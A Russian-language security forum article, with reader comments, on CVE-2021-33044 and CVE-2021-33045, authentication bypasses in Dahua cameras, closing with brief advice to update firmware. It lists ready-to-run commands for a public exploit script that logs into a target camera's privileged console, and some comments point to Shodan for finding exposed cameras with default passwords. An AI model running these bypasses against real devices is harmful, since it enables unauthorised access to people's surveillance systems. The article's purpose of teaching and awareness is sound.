• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Уязвимости CVE-2021-33044 и CVE-2021-33045

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 997
BIT
1
dahua.PNG


Приветствую Уважаемых Форумчан и Друзей.
Сегодня поговорим немного об уязвимости в конфигурации устройств Dahua.

CVE-2021-33044 и CVE-2021-33045 были обнаружены ещё летом 2021 года.
Но по каким-то причинам, более подробно о них стало известно ближе к сентябрю.
На данный момент им присвоена высокая степень опасности.

cve-2021-33044.PNG


cve-2021-33045.PNG


Затрагивают уязвимости видеокамеры компании Dahua.
Эксплуатируются несколькими методами обхода аутентификации.
После чего легко получить доступ к консоли и выполнять множество команд.

Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.
Запрещено её использование в незаконных целях.


В своём примере для изучения пользовался скриптом от mcw0,написанном на python:
Код:
# git clone https://github.com/mcw0/DahuaConsole.git
# cd DahuaConsole/
# pip3 install -r requirements.txt

Примеры запуска скрипта для CVE-2021-33044
Код:
# ./Console.py --logon netkeyboard --rhost IP_цели --proto dhip --rport 80
# ./Console.py --logon netkeyboard --rhost IP_цели --proto http --rport 80
# ./Console.py --logon netkeyboard --rhost IP_цели --proto https --rport 80

Пример запуска скрипта для CVE-2021-33045
Код:
# ./Console.py --logon loopback --rhost IP_цели --proto dhip --rport 80
Список типов и моделей уязвимых устройств можно видеть на сайте Dahua,он
Сам скрипт имеет меню help с опциями
dahua1.png


Устройств с уязвимой конфигурацией, к сожалению, много.
Рассмотрим тестируемую цель.
Скрипт сразу покажет, если цель уязвима.
dahua2.png


Здесь можно видеть, что мы в консоли и права уже повышены.
dahua3.png


Можно также посмотреть доступные команды
dahua4.png


Далее, можно извлекать различную информацию, создавать клиента и т.д.
dahua5.png


Здесь вывел список доступных сервисов
dahua6.png


Действительно много чего доступно
dahua7.png


Защита
Разработчики пока решили пойти кратчайшим стандартным путём.
И предлагают обновиться пользователям до новых версий ПО, либо сразу установить последние версии.
Всё это предлагается

И всё-таки что-то подсказывает, мы ещё услышим об атаках на подобные девайсы.
Всем мира, добра и до новых встреч.
 
Последнее редактирование модератором:
02.03.2021
544
398
BIT
172
Отличная статья, благодарю Вас.

P.S. зная отношение многих работников к настройке и обслуживанию камер видео наблюдения, они могут даже дефолтный пароль не поменять. Не говоря уже про обновление ПО.
 
  • Нравится
Реакции: Vertigo

shinza

Green Team
28.08.2017
18
10
BIT
1
товарищ bp2008 сразу создал расширение для Chrome (на данный момент 4 версия), которое использует эту уязвимость Dahua, которое показывает, насколько просто зайти в систему с камерами Dahua без необходимости знать пароль.
Позиционируя свое расширение как инструмент для восстановления устройств с утерянным паролем, но он также служит напоминанием всем НЕ ПРЕДОСТАВЛЯТЬ ИХ КАМЕРЫ / NVR ДЛЯ ИНТЕРНЕТА .
137221417-ef9fe775-44c1-4517-919f-902f3ba3eda1.png
 
  • Нравится
Реакции: Сергей Сталь

woolf1514

Green Team
06.03.2017
181
191
BIT
1
Лайк!
Еще можно заглянуть в Shodan, если он живой еще. Там и без этой CVE найдется Dahua камер с дефолтными паролями)
 
  • Нравится
Реакции: Vertigo
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!